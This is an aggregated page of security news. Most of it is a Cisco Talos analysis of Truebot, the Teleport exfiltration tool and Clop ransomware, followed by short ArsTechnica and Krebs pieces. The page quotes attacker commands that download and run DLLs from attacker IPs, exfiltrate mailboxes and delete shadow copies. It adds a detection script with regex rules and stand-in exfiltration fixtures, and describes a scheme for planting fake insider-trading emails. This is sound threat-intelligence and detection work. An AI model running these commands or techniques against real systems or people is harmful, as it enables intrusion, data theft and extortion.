Security Posts

Infocon: green

SANS Internet Storm Center, InfoCON: green - Thu, 2022/12/08 - 23:47
Finding Gaps in Syslog - How to find when nothing happened
Categories: Security Posts

Breaking the silence - Recent Truebot activity

Cisco Talos - Thu, 2022/12/08 - 21:38
Since August 2022, we have seen an increase in infections of Truebot (aka Silence.Downloader) malware. Truebot was first identified in 2017, and researchers have linked it to a threat actor called Silence Group, which is responsible for several high-impact attacks on financial institutions in several countries around the world. Other researchers claim that this group is associated with the well-known threat actor TA505 (aka Evil Corp). In our research, we found that one of the new follow-on payloads that Truebot drops is Grace (aka FlawedGrace and GraceWire) malware, which is attributed to TA505, further supporting these claims.

Recently, the attackers have shifted from using malicious emails as their primary delivery method to other techniques. In August, we saw a small number of attacks that exploited a recent remote code execution vulnerability in Netwrix Auditor. In October, a larger number of infections leveraged Raspberry Robin, a recent malware spread through USB drives, as a delivery vector. We believe with moderate confidence that during November, the attackers started using yet another way to distribute the malware.

Post-compromise activity included data theft and the execution of Clop ransomware. While investigating one of these attacks, we found what seems to be a fully featured custom data exfiltration tool, which we are calling "Teleport," that was extensively used to steal information during the attack.

So far, we have identified two different Truebot botnets. One is distributed worldwide, but with particular focus on Mexico, Pakistan, and Brazil. The second, more recent botnet appears to be focused on the U.S. While we don't have enough information to say that there is a specific focus on a sector, we noticed a number of compromised education sector organizations.

New attack vectors

In August, we noticed a small number of cases where Truebot was executed after the exploitation of a vulnerability in Netwrix Auditor, an IT asset management tool.
We have high confidence that this was used as the entry vector in some of the compromised organizations. However, because this product is rarely exposed directly to the internet, it is unlikely that the attackers managed to compromise a high number of systems this way.

Later, at the beginning of October, we started seeing a bigger uptick in Truebot infections, as it started being delivered by Raspberry Robin malware. This was also noticed by others, such as Microsoft, which wrote a blog post focused on the connections of Raspberry Robin to a larger ecosystem that included Truebot as one of the payloads. We believe with high confidence that these two vectors, mainly the Raspberry Robin delivery, led to the creation of a botnet of over 1,000 systems that is distributed worldwide, but with particular focus on Mexico, Brazil, and Pakistan, as seen in the following image.

In November, we started seeing a new botnet being created. The following image shows the evolution of the infections on this botnet, based on OpenDNS telemetry:
While the victims of the first botnet were mostly desktop systems not directly accessible from the internet, this second botnet is almost exclusively composed of Windows servers directly connected to the internet and exposing several Windows services such as SMB, RDP, and WinRM, but interestingly not Netwrix. This suggests that the attackers are using another distribution mechanism, although we have not yet identified this attack vector. This new botnet, with over 500 infections at the time of writing, seems to be focused on the U.S. (around 75% of infections). The following image shows the geographic infection distribution.

Netwrix vulnerability (CVE-2022-31199) based delivery

Between mid-August and September, we observed a small number of events in which suspicious commands were executed by a process named UAVRServer.exe. This process triggered the execution of bitsadmin to download and execute a binary. Further research revealed that this binary was an updated version of Truebot. The following is an example of one of these commands executed by the UAVRServer.exe process:

C:\Windows\System32\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll c:\ProgramData\msruntime.dll&rundll32 /S c:\ProgramData\msruntime.dll,fff&del c:\ProgramData\msruntime.dll

We were not able to collect the exploit code. However, because several of these events occurred in the same timeframe at unrelated organizations, we believe with high confidence that they are the result of the exploitation of a vulnerability in Netwrix Auditor (CVE-2022-31199) that was made public in July 2022 by Bishop Fox. Netwrix Auditor is an auditing tool used to assess the compliance of IT assets with security and other best practices and, according to the vulnerability disclosure document: “Netwrix Auditor is vulnerable to an insecure object deserialization issue that is caused by an unsecured .NET remoting service. An attacker can submit arbitrary objects to the application through this service to achieve remote code execution on Netwrix Auditor servers.”

However, the vulnerable .NET remoting service would not usually be exposed to the internet, which may explain why we have seen only a small number of these attacks. We were able to confirm that at least one of the exploited systems was directly exposed to the internet with minimal or no firewall protection, and we believe with high confidence that this exploit was the entry vector to an attack that included further post-compromise activity. According to the vulnerability disclosure document: “Since this service is typically executed with extensive privileges in an Active Directory environment, the attacker would likely be able to compromise the Active Directory domain.”

This means that exploiting the vulnerability is effectively a fast track to compromising an organization domain-wide. It also means that this vulnerability is likely to be exploited within organizations that are already compromised, to obtain administrative rights without raising any red flags. This vulnerability had been published only a few weeks before the attacks took place, and the number of systems exposed to the internet is expected to be quite small. This suggests that the attackers are not only on the lookout for new infection vectors, but are also able to quickly test them and incorporate them into their workflow.

Raspberry Robin delivery

More recently, since the beginning of October, we started seeing a higher number of systems infected with Truebot. This timeframe corresponded with new research that found many of these systems had previous Raspberry Robin infections that were delivering Truebot. This has been documented by Microsoft in a blog detailing how Raspberry Robin is part of a larger criminal ecosystem and has recently started delivering a few other malware families, including FakeUpdates, IcedID, Bumblebee, and Truebot.
In our telemetry, we have observed multiple occurrences of Raspberry Robin delivering Truebot. The following image illustrates the attack sequence. The system was infected with Raspberry Robin through a USB device and, just a few minutes later, the malicious process downloaded the Truebot .dll file and executed it using rundll32.exe. In other cases, the Raspberry Robin infection that delivered Truebot had been present for some time.

New Truebot version

Truebot is a downloader malware. As such, its main goal is to infect systems, collect information to help triage interesting targets, and deploy additional payloads. Once a system is infected, the malware collects information and sends it to the attacker’s command and control (C2). This version collects additional information: a screenshot, the computer name, the local network name, and Active Directory trust relations.

This collected information hints at what the attackers are looking for. Active Directory trust relations allow organizations to share users and resources across domains. Some use cases include extranets, connecting service providers, or even mergers and acquisitions. This suggests the attackers are targeting large organizations, where these relations are more commonly deployed. Besides being a good indicator of a large organization, one example where this information could prove useful would be in finding a poorly protected network (for example, a recently acquired company) that provides an entry route to a more secure network.

As a downloader tool, there are also some features that were not present in previously documented versions of the malware. Besides downloading and executing files, the malware is now able to load and execute additional modules and shellcode in memory, making the payloads less likely to be detected.

As illustrated in the image above, the “404NOTFOUND” command is used to emit no command.
The “KLL | KLLSELF” commands cause the bot to uninstall itself and, if the response contains an HTTP URL followed by a “| <action>” keyword, it performs one of the following actions:
  • |EXE – Download and run .exe file
  • |DLL – Download and run .dll file
  • |PS1 – Download and run .ps1 file
  • |BAT – Download and run .bat file
  • |DNM – Download and run .dll in memory
  • |SCH – Download and run shellcode
  • |S64 – Download and run 64 bit shellcode
The communication protocol changed slightly to include the new features. In summary, the HTTP communication includes new fields for the network name and trust relations data, and it is sent as a POST request with a parameter “q=<base64 encoded data>”. The remaining protocol details and encryption mechanism seem to remain unchanged, as has been previously documented.

Post-compromise activity

Post compromise, we found two payloads delivered by Truebot, Cobalt Strike and Grace malware, and what seems to be a custom data exfiltration tool that was used extensively by the attackers to steal information from the network.

Grace and Cobalt Strike

Once the systems have been compromised with Truebot, the attackers triage what seem to be interesting systems for further analysis and deploy additional malware to assist in that analysis. In this case, the payloads we found were 32- and 64-bit versions of Cobalt Strike reverse shell shellcode, Cobalt Strike delivered through PowerShell reflection, and a Grace shellcode loader with a complex packer that contained the Grace malware. This packer, which Outpost24 named “GraceWrapper” and documented extensively in a recent blog post, was analyzed based on samples from an attack documented by Proofpoint in late 2021, where the new version of Grace was spotted. After unpacking, we were able to obtain a Grace binary, easily identifiable by a string in memory as well as the C++ class names left in the binary.

Finding Grace as a payload is interesting, as it is known to be almost exclusively used by TA505. This further strengthens previous claims of a connection between Silence Group and TA505 made by Group-IB, based on source code comparison with FlawedAmmyy, and by Deutsche Telekom, which identified different malware packed with TA505’s custom packer.

"Teleport" exfiltration tool

After dropping one of the described payloads, the post-compromise attack flow is similar to that of other human-operated attacks.
However, while investigating, we came across a set of commands to exfiltrate stolen data that made use of a tool that was unknown to us. After examining the binary, we found what seems to be a custom data exfiltration tool built in C++ and containing several features that make the process of data exfiltration easier and stealthier. We are calling it "Teleport" based on the communication encryption key hardcoded in the binary. Regarding the tool’s features, the usage information printed by the tool itself is a good summary:

Usage: tool.exe /RH:str /RP:int [/RS:int] [/P:str] [/D:str] [/DS:str] [/M:str] [/MX:str] [/SL:int] [/SU:int] [/CS:str] [/CU:str] [/MS:str] [/MU:str] [/E] [/K] [/Q]
  /RH:str -- Server host name to upload to
  /RP:int -- Server port number to upload to
  /RS:int -- Upload speed (in kilobytes per second)
  /P:str  -- Directory prefix
  /D:str  -- Directory to download from (recursive search)
  /DS:str -- Directory to download from (non-recursive search)
  /M:str  -- File mask (default is *.*)
  /MX:str -- File mask to exclude
  /SL:int -- Lower size limit (in bytes)
  /SU:int -- Upper size limit (in bytes)
  /CS:str -- Creation date since (DDMMYYYY)
  /CU:str -- Creation date until (DDMMYYYY)
  /MS:str -- Modified date since (DDMMYYYY)
  /MU:str -- Modified date until (DDMMYYYY)
  /E      -- Prescan mode (cache files before sending)
  /K      -- Remove itself after execution
  /Q      -- Quiet mode (don't show messages)
Either /D or /DS must be specified. Flags /M, /MX, /D and /DS may be used more than once.

Looking at the feature list we can see that, while not malicious per se, the tool has some features that are uncommon in remote copying tools and that are useful to an attacker exfiltrating data during an attack:
  • Limiting the upload speed, which can make the transmission go undetected by tools that monitor for large data exfiltration, and which avoids slowing the network down with the file copying activity.
  • The communication is encrypted with a custom protocol to hide what information is being transmitted.
  • Limiting the file size, which can maximize the number of stolen files by avoiding lengthy copies of files that may not be interesting.
  • The ability to delete itself after use, which is ideal to keep it as unknown as possible.
While testing Teleport, we saw that the data was not in clear text. Further analysis revealed that it uses a custom communication protocol that encrypts data using AES and a hardcoded key. Reverse engineering revealed the following protocol structure, which wraps the messages in an encryption layer. Most messages sent by the tool to its server start with a message-type identifier, followed by the size of the remaining payload. Of that payload, the first four bytes are a CRC32 check to ensure the integrity of the message, the next 16 bytes are a random initialization vector, and the remaining bytes are the payload content encrypted with AES/CBC/NoPadding.

The use of a custom data exfiltration tool is curious. Why would an attacker develop such a tool when there are so many file copying solutions available? There are a few possible reasons. For example, it makes the process of stealing interesting information from an unknown network of unknown systems faster. If we look at its use during the attack, we can see that the attackers are repeating, on a large number of systems, a few commands that they know have good potential for gathering valuable information. For example:

<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\onedrive
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /M:*.ost /M:*.pst /P:<remote path> /d:\\<local network host>\c$\users\<username>\appdata\local\microsoft\outlook
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\downloads

These commands collect interesting files from the user’s OneDrive and Downloads folders and collect the user’s Outlook mailbox files (.ost and .pst).
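When reversing a framing layout like the one described above, the first thing an analyst wants is a dissector that splits a captured client-to-server stream into frames and checks that the CRC and the block alignment line up; if they do not line up across many frames, the assumed field widths are wrong. The following is an added example for this page, not Talos code or output from the Teleport binary. It assumes a 1-byte type, a 4-byte little-endian size, and a CRC32 computed over IV plus ciphertext, none of which the post states; the stream it parses is constructed, with fixed bytes standing in for ciphertext, since decrypting real traffic would require the hardcoded key.

```python
"""Added example (not Talos code): split a captured Teleport-style byte stream
into frames using the layout described in the post:

    type | size | crc32 | iv (16 bytes) | AES-CBC ciphertext (no padding)

Assumed here, because the post does not state them: a 1-byte type, a 4-byte
little-endian size, and a CRC32 computed over iv + ciphertext. The stream at
the bottom is constructed; the "ciphertext" is fixed filler bytes.
"""
import struct
import zlib

AES_BLOCK = 16
HEADER = struct.Struct("<BI")  # assumed: type byte, little-endian payload size


def build_frame(msg_type, iv, ciphertext):
    """Encode one frame under the assumed layout (used to build test data)."""
    body = struct.pack("<I", zlib.crc32(iv + ciphertext)) + iv + ciphertext
    return HEADER.pack(msg_type, len(body)) + body


def parse_stream(data):
    """Walk a stream of concatenated frames, recording integrity checks per frame."""
    frames, offset = [], 0
    while offset < len(data):
        if len(data) - offset < HEADER.size:
            frames.append({"offset": offset, "error": "truncated header"})
            break
        msg_type, size = HEADER.unpack_from(data, offset)
        body = data[offset + HEADER.size: offset + HEADER.size + size]
        if len(body) != size or size < 4 + AES_BLOCK:
            frames.append({"offset": offset, "error": "truncated body"})
            break
        crc = struct.unpack("<I", body[:4])[0]
        iv, ct = body[4:20], body[20:]
        frames.append({
            "offset": offset,
            "type": msg_type,
            "iv": iv.hex(),
            "ciphertext_len": len(ct),
            # CRC32 over iv + ciphertext is an assumption about where the check applies
            "crc_ok": zlib.crc32(iv + ct) == crc,
            # AES/CBC/NoPadding implies the ciphertext is a non-empty multiple of 16
            "block_aligned": len(ct) > 0 and len(ct) % AES_BLOCK == 0,
        })
        offset += HEADER.size + size
    return frames


def suspicious(frames):
    """Frames that do not fit the assumed layout. A run of these across a whole
    capture means the field widths are wrong, not that the data is corrupt."""
    return [f for f in frames if f.get("error") or not (f["crc_ok"] and f["block_aligned"])]


# Constructed stream: two good frames, one with a flipped ciphertext byte,
# one whose ciphertext length is not a multiple of the AES block, then junk.
IV = bytes(range(16))
F1 = build_frame(1, IV, bytes([0x11]) * 32)
F2 = build_frame(2, IV, bytes([0x22]) * 64)
F3 = build_frame(1, IV, bytes([0x33]) * 32)
F3 = F3[:-1] + bytes([F3[-1] ^ 0xFF])           # corrupt last ciphertext byte
F4 = build_frame(1, IV, bytes([0x44]) * 20)      # 20 bytes: not block aligned
STREAM = F1 + F2 + F3 + F4 + b"\x05\x00\x00"     # 3 trailing bytes: short header

if __name__ == "__main__":
    for f in parse_stream(STREAM):
        print(f)
    print("suspicious frames:", len(suspicious(parse_stream(STREAM))))
```

Run against a real capture, the frame at the first offset where checks start failing is where the layout guess breaks down; a single bad frame in an otherwise clean run is more likely a truncated capture.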
Combining filtering by extension, file size, and file age allows the creation of commands that are repeatable and effective.

Another reason is stealth. The tool is not on the list of commonly used file copying tools, which by itself provides limited stealthiness, but it also allows limiting bandwidth usage and encrypting the communication.

The Clop attack

As previously mentioned, one of the possible outcomes of these attacks is double extortion using Clop ransomware. We had the opportunity to investigate one of these attacks in further detail. The following table summarizes the techniques used, organized by the MITRE ATT&CK framework.

The attack was in essence similar to many other human-operated ransomware attacks. After compromise, the attackers dropped Cobalt Strike on several systems and started mapping the network and moving laterally to systems of interest. During the exploration and lateral movement phases, the attackers browsed key server and desktop file systems, connected to SQL databases, and collected data that was exfiltrated using the Teleport tool to an attacker-controlled server. Once sufficient data had been collected, the attackers created scheduled tasks on a large number of systems to simultaneously start executing the Clop ransomware and encrypt the highest possible volume of data.

Coverage

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign.
You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs are applicable to this threat: 60844-60845, 60948-60949, 300329
IOCs

Netwrix exploitation command examples:
C:\Windows\System32\cmd.exe /c bitsadmin /transfer IVjATqWXcLnw hxxp://179[.]60[.]150[.]53:80/download/GoogleUpdate.dll c:\ProgramData\IVjATqWXcLnw.dll&rundll32 /S c:\ProgramData\IVjATqWXcLnw.dll,fff
C:\Windows\System32\cmd.exe /c bitsadmin /transfer SysLog hxxp://179[.]60[.]150[.]34:80/download/file.ext c:\ProgramData\GUpdate.dll&rundll32 c:\ProgramData\GUpdate.dll,0&del c:\ProgramData\GUpdate.dll
C:\Windows\System32\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll c:\ProgramData\msruntime.dll&rundll32 /S c:\ProgramData\msruntime.dll,fff&del c:\ProgramData\msruntime.dll

New Truebot version

Samples:
092910024190a2521f21658be849c4ac9ae6fa4d5f2ecd44c9055cc353a26875
1ef8cdbd3773bd82e5be25d4ba61e5e59371c6331726842107c0f1eb7d4d1f49
2d50b03a92445ba53ae147d0b97c494858c86a56fe037c44bc0edabb902420f7
55d1480cd023b74f10692c689b56e7fd6cc8139fb6322762181daead55a62b9e
58b671915e239e9682d50a026e46db0d775624a61a56199f7fd576b0cef4564d
6210a9f5a5e1dc27e68ecd61c092d2667609e318a95b5dade3c28f5634a89727
68a86858b4638b43d63e8e2aaec15a9ebd8fc14d460dd74463db42e59c4c6f89
72813522a065e106ac10aa96e835c47aa9f34e981db20fa46a8f36c4543bb85d
7a64bc69b60e3cd3fd00d4424b411394465640f499e56563447fe70579ccdd00
7c79ec3f5c1a280ffdf19d0000b4bfe458a3b9380c152c1e130a89de3fe04b63
7e39dcd15307e7de862b9b42bf556f2836bf7916faab0604a052c82c19e306ca
97d0844ce9928e32b11706e06bf2c4426204d998cb39964dd3c3de6c5223fff0
bf3c7f0ba324c96c9a9bff6cf21650a4b78edbc0076c68a9a125ebcba0e523c9
c3743a8c944f5c9b17528418bf49b153b978946838f56e5fca0a3f6914bee887
c3b3640ddf53b26f4ebd4eedf929540edb452c413ca54d0d21cc405c7263f490
c6c4f690f0d15b96034b4258bdfaf797432a3ec4f73fbc920384d27903143cb0
b95a764820e918f42b664f3c9a96141e2d7d7d228da0edf151617fabdd9166cf
80b9c5ec798e7bbd71bbdfffab11653f36a7a30e51de3a72c5213eafe65965d9

Download URLs:
hxxp://179[.]60[.]150[.]34:80/download/file.ext
hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll
hxxp://179[.]60[.]150[.]53:80/download/GoogleUpdate.dll
hxxp://tddshht[.]com/chkds.dll

C2 addresses:
hxxp://nefosferta[.]com/gate.php
hxxp://185[.]55[.]243[.]110/gate.php
hxxp://gbpooolfhbrb[.]com/gate.php
hxxp://88[.]214[.]27[.]100/gate.php
hxxp://hiperfdhaus[.]com/gate.php
hxxp://88[.]214[.]27[.]101/gate.php
hxxp://jirostrogud[.]com/gate.php

Data exfiltration tool

Sample:
dd94c2fc46a6670b4600cf439b35dc81a401b09d2c2372139afe7b754d1d24d4

Grace

Sample (decrypted shellcode):
27b6e71b4adeada41fb1e411a910872bfad999183d9d43ba6e63602e104d357b

C2:
45[.]227[.]253[.]102

Clop ransomware

The following are some of the command lines observed during this attack that may help detect ongoing malicious activity. There are, however, benign or dual-use tools and commands in this list, so they should not be used as the sole indicator of an ongoing attack.
adfind.exe -f &(objectcategory=computer) operatingsystem -csv
adfind -f objectcategory=person samaccountname name displayname givenname department description title mail logoncount -csv
adfind.exe -h <redacted> -f &(objectcategory=computer) operatingsystem samaccountname name displayname givenname department description title mail logoncount -csv
sqlcmd -q select name from sys.databases
sqlcmd -s <hostname> -q select name from sys.databases
sqlcmd -s <hostname> -q set nocount on; select table_name from information_schema.tables where table_type = 'base table' -h -1 -w -e -d cct_db
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\onedrive
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /M:*.ost /M:*.pst /P:<remote path> /d:\\<local network host>\c$\users\<username>\appdata\local\microsoft\outlook
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\downloads
C:\Windows\System32\wbem\WMIC.exe shadowcopy where ID=<redacted> delete
C:\windows\WinCDropQSysvolY.exe
C:\windows\WinCDropQSysvolY.exe runrun
schtasks.exe /create /tn OneDrvTest /tr C:\windows\SysZDropQLogonQ.exe /s <redacted> /sc onstart /ru system /f
schtasks.exe /run /tn OneDrvTest /s <redacted>
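Because several of the commands above are dual-use, the practical way to use them is as a set of command-line patterns matched against process-creation telemetry (Sysmon event ID 1, EDR process events) together with the parent process, which the post identifies as UAVRServer.exe for the Netwrix exploitation. The following is an added example for this page, not Talos code or a Talos detection. The events it scans are constructed: the command lines are the post's own examples with the redacted fields filled by invented placeholders (tp.exe, exfil.example.net, ws-fin-07, jdoe, a made-up shadow copy ID), and the parent process names are assumptions except for UAVRServer.exe.

```python
"""Added example (not Talos code): triage process-creation events for the
command-line patterns described in the Truebot/Clop post. EVENTS is
constructed test data; redacted values from the post are replaced with
invented placeholders (tp.exe, exfil.example.net, ws-fin-07, jdoe).
"""
import re

# (parent image, command line). Defanged hxxp:// and [.] are kept as in the post.
EVENTS = [
    # Netwrix Auditor exploitation: UAVRServer.exe -> cmd -> bitsadmin -> rundll32
    ("UAVRServer.exe", r"C:\Windows\System32\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll c:\ProgramData\msruntime.dll&rundll32 /S c:\ProgramData\msruntime.dll,fff&del c:\ProgramData\msruntime.dll"),
    ("UAVRServer.exe", r"C:\Windows\System32\cmd.exe /c bitsadmin /transfer SysLog hxxp://179[.]60[.]150[.]34:80/download/file.ext c:\ProgramData\GUpdate.dll&rundll32 c:\ProgramData\GUpdate.dll,0&del c:\ProgramData\GUpdate.dll"),
    # Teleport-style exfiltration of OneDrive and Outlook data over a remote c$ share
    ("cmd.exe", r"tp.exe /RH:exfil.example.net /RP:443 /x:Passw0rd /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:ws-fin-07 /d:\\ws-fin-07\c$\users\jdoe\onedrive"),
    ("cmd.exe", r"tp.exe /RH:exfil.example.net /RP:443 /x:Passw0rd /MX:thumbs.db /M:*.ost /M:*.pst /P:ws-fin-07 /d:\\ws-fin-07\c$\users\jdoe\appdata\local\microsoft\outlook"),
    # AD discovery, shadow copy deletion, and the SYSTEM scheduled task that launched Clop
    ("cmd.exe", r"adfind.exe -f &(objectcategory=computer) operatingsystem -csv"),
    ("cmd.exe", r"C:\Windows\System32\wbem\WMIC.exe shadowcopy where ID={7d3a0f1e-0000-4000-8000-000000000001} delete"),
    ("cmd.exe", r"schtasks.exe /create /tn OneDrvTest /tr C:\windows\SysZDropQLogonQ.exe /s ws-fin-07 /sc onstart /ru system /f"),
    # Benign look-alikes that must not fire
    ("explorer.exe", r"bitsadmin /transfer Update https://dl.example.com/setup.msi c:\Users\jdoe\Downloads\setup.msi"),
    ("explorer.exe", r"schtasks /create /tn Backup /tr C:\Program Files\Backup\run.exe /sc daily /ru system"),
    ("explorer.exe", r"robocopy \\ws-fin-07\c$\users\jdoe\onedrive D:\backup /E"),
    ("explorer.exe", r"wmic shadowcopy list brief"),
]

RULES = [
    # bitsadmin pulls a file over HTTP into ProgramData and rundll32 runs it in the same line
    ("bitsadmin_dll_chain",
     re.compile(r"bitsadmin\s+/transfer\b.*?https?://\S+\s+\S*programdata\\\S+\.dll\s*&\s*rundll32", re.I)),
    # Teleport switch set pointed at a remote user profile via the c$ admin share
    ("teleport_exfil",
     re.compile(r"/RH:\S+\s.*?/RP:\d+.*?/d:\\\\\S+\\c\$\\users\\", re.I)),
    # AdFind enumeration of computers or users
    ("adfind_enum",
     re.compile(r"\badfind(\.exe)?\s.*\bobjectcategory=(computer|person)\b", re.I)),
    # Shadow copy deletion ahead of encryption
    ("shadowcopy_delete",
     re.compile(r"\bwmic(\.exe)?\s+shadowcopy\b.*\bdelete\b", re.I)),
    # Scheduled task running a binary dropped directly in C:\windows as SYSTEM
    ("schtasks_system_from_windows_root",
     re.compile(r"\bschtasks(\.exe)?\s+/create\b.*?/tr\s+c:\\windows\\[^\\\s]+\.exe\b.*?/ru\s+system\b", re.I)),
]

SPAWN_FROM_NETWRIX = re.compile(r"\bcmd\.exe\b|\bbitsadmin\b|\brundll32\b|\bpowershell\b", re.I)


def refang(cmd):
    """Undo hxxp:// and [.] defanging so patterns written for live telemetry match IOCs too."""
    return re.sub(r"\[\.\]", ".", re.sub(r"hxxp", "http", cmd, flags=re.I))


def triage(events):
    """Return (rule, parent, command line) for every pattern that fires."""
    hits = []
    for parent, cmd in events:
        c = refang(cmd)
        # The post's own observation: the Netwrix Auditor service process spawning a shell
        if parent.lower() == "uavrserver.exe" and SPAWN_FROM_NETWRIX.search(c):
            hits.append(("netwrix_auditor_spawn", parent, cmd))
        for name, rx in RULES:
            if rx.search(c):
                hits.append((name, parent, cmd))
    return hits


if __name__ == "__main__":
    for rule, parent, cmd in triage(EVENTS):
        print(f"{rule:36} {parent:16} {cmd[:80]}")
```

Keep the benign look-alikes in any real rule set as regression tests: the adfind and schtasks patterns in particular are dual-use, and the post itself warns that none of these should be treated as the sole indicator of an attack.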
Categories: Security Posts

North Korean hackers once again exploit Internet Explorer’s leftover bits

ArsTechnica: Security Content - Thu, 2022/12/08 - 20:43
APT37, a group believed to be backed by the North Korean government, has found success exploiting the bits of Internet Explorer still present in various Windows-based apps. (credit: Aurich Lawson | Getty Images)

Microsoft's Edge browser has replaced Internet Explorer in almost every regard, but some exceptions remain. One of those, deep inside Microsoft Word, was exploited by a North Korean-backed group this fall, Google security researchers claim. It's not the first time the government-backed APT37 has used Internet Explorer's lingering presence, as Google's Threat Analysis Group (TAG) notes in a blog post. APT37 has had repeated success targeting South Korean journalists and activists, plus North Korean defectors, through a limited but still successful Internet Explorer pathway. The last exploit targeted those heading to Daily NK, a South Korean site dedicated to North Korean news. This one involved the Halloween crowd crush in Itaewon, which killed at least 151 people. A Microsoft Word .docx document, named as if it were timed and dated less than two days after the incident and labeled "accident response situation," started circulating. South Korean users began submitting the document to the Google-owned VirusTotal, where it was flagged with CVE-2017-0199, a long-known vulnerability in Word and WordPad.
Categories: Security Posts

New Ransom Payment Schemes Target Executives, Telemedicine

Krebs - Thu, 2022/12/08 - 20:25
Ransomware groups are constantly devising new methods for infecting victims and convincing them to pay up, but a couple of strategies tested recently seem especially devious. The first centers on targeting healthcare organizations that offer consultations over the Internet and sending them booby-trapped medical records for the “patient.” The other involves carefully editing email inboxes of public company executives to make it appear that some were involved in insider trading.

Alex Holden is founder of Hold Security, a Milwaukee-based cybersecurity firm. Holden’s team gained visibility into discussions among members of two different ransom groups: CLOP (a.k.a. “Cl0p” a.k.a. “TA505”), and a newer ransom group known as Venus.

Last month, the U.S. Department of Health and Human Services (HHS) warned that Venus ransomware attacks were targeting a number of U.S. healthcare organizations. First spotted in mid-August 2022, Venus is known for hacking into victims’ publicly-exposed Remote Desktop services to encrypt Windows devices.

Holden said the internal discussions among the Venus group members indicate this gang has no problem gaining access to victim organizations. “The Venus group has problems getting paid,” Holden said. “They are targeting a lot of U.S. companies, but nobody wants to pay them.”

Which might explain why their latest scheme centers on trying to frame executives at public companies for insider trading charges. Venus indicated it recently had success with a method that involves carefully editing one or more email inbox files at a victim firm to insert messages discussing plans to trade large volumes of the company’s stock based on non-public information.
“We imitate correspondence of the [CEO] with a certain insider who shares financial reports of his companies through which your victim allegedly trades in the stock market, which naturally is a criminal offense and — according to US federal laws [includes the possibility of up to] 20 years in prison,” one Venus member wrote to an underling.

“You need to create this file and inject into the machine(s) like this so that metadata would say that they were created on his computer,” they continued. “One of my clients did it, I don’t know how. In addition to pst, you need to decompose several files into different places, so that metadata says the files are native from a certain date and time rather than created yesterday on an unknown machine.”

Holden said it’s not easy to plant emails into an inbox, but it can be done with Microsoft Outlook .pst files, which the attackers may also have access to if they’d already compromised a victim network. “It’s not going to be forensically solid, but that’s not what they care about,” he said. “It still has the potential to be a huge scandal — at least for a while — when a victim is being threatened with the publication or release of these records.”

The Venus ransom group’s extortion note. Image: Tripwire.com

Holden said the CLOP ransomware gang has a different problem of late: Not enough victims. The intercepted CLOP communication seen by KrebsOnSecurity shows the group bragged about twice having success infiltrating new victims in the healthcare industry by sending them infected files disguised as ultrasound images or other medical documents for a patient seeking a remote consultation. The CLOP members said one tried-and-true method of infecting healthcare providers involved gathering healthcare insurance and payment data to use in submitting requests for a remote consultation on a patient who has cirrhosis of the liver.
“Basically, they’re counting on doctors or nurses reviewing the patient’s chart and scans just before the appointment,” Holden said. “They initially discussed going in with cardiovascular issues, but decided cirrhosis or fibrosis of the liver would be more likely to be diagnosable remotely from existing test results and scans.”

While CLOP as a money making collective is a fairly young organization, security experts say CLOP members hail from a group of Threat Actors (TA) known as “TA505,” which MITRE’s ATT&CK database says is a financially motivated cybercrime group that has been active since at least 2014. “This group is known for frequently changing malware and driving global trends in criminal malware distribution,” MITRE assessed.

In April 2021, KrebsOnSecurity detailed how CLOP helped pioneer another innovation aimed at pushing more victims into paying an extortion demand: Emailing the ransomware victim’s customers and partners directly and warning that their data would be leaked to the dark web unless they can convince the victim firm to pay up.

Security firm Tripwire points out that the HHS advisory on Venus says multiple threat actor groups are likely distributing the Venus ransomware. Tripwire’s tips for all organizations on avoiding ransomware attacks include:
  • Making secure offsite backups.
  • Running up-to-date security solutions and ensuring that your computers are protected with the latest security patches against vulnerabilities.
  • Using hard-to-crack unique passwords to protect sensitive data and accounts, as well as enabling multi-factor authentication.
  • Encrypting sensitive data wherever possible.
  • Continuously educating and informing staff about the risks and methods used by cybercriminals to launch attacks and steal data.
